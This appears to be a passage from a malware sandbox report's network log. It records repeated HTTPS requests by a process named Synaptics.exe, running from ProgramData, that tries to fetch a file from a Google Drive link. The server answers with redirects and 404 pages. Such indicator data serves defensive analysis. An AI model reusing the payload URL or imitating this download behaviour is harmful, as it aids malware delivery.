                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:29 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4WOSPWpM7pzX4ZiD-mZe-mvakOBU98m260O6fpv8xExiqp48-Yxc63hoqZnbVEZkzd
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:29 GMT
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-tvbMUvniZ0jel4GCV24lRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:29 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:29 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 34 44 38 7a 37 56 79 37 52 44 71 6c 62 4b 31 42 36 73 4a 57 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="m4D8z7Vy7RDqlbK1B6sJWg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:29 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        77192.168.2.750086142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:28 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:29 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-cDX9LlzIOiA7V7uMEmp8iA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        78192.168.2.750089142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:28 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:29 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6ps02OvxWtNMMAe_BEi2q9G3wM9ThvNxUEqVFhm83fiFu-W0kBcPjdWKnJpZdRq44h
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:29 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-_XcyCMOs4X9GLi9bHjGAzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:29 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:29 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 73 79 65 64 78 65 2d 38 39 50 53 47 62 74 57 76 69 6a 38 51 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="Csyedxe-89PSGbtWvij8QQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:29 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        79192.168.2.750095142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:29 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:29 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-TYd1ykXuaOzq8GOub62kjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        80192.168.2.750096142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:29 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        81192.168.2.750097142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:29 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        82192.168.2.750098142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:29 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        83192.168.2.750101142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:30 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:31 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:30 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-zv7UOmRRyDA2Ih3IuGjZTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        84192.168.2.750102142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:30 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:31 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:30 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Ee5YKY3ek8bWEuB1h41vLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        85192.168.2.750103142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:30 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:31 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4MK3E-AwcJulIXQ0UZgkN809tKNDavKOseqoznTaoV_kn5cuKzsLmzS7f5khnxrfxA
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:30 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Kyof0GHRxxHTaM6xEMabOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:31 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
